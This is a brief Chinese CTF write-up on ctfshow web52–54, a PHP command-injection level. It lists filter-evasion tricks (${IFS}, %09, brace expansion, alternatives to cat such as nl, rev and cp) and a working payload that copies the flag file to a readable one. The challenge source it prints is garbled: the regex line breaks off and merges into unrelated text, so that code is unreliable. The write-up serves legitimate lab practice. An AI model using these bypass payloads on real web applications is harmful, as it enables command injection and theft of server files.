ctfshow之web52~web54

web52

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 

 空格绕过：

%09

<>

${IFS}

$IFS$

{cat,fl*}

%20

绕过cat/tac：

tac more less head tail nl od(二进制查看) vi vim sort uniq rev cp mv

cp命令尝试：?c=cp${IFS}fla.?php${IFS}a.txt||//（//后面的内容可以不写的，因为类似会被注释掉）

 

 答案也是不在这里，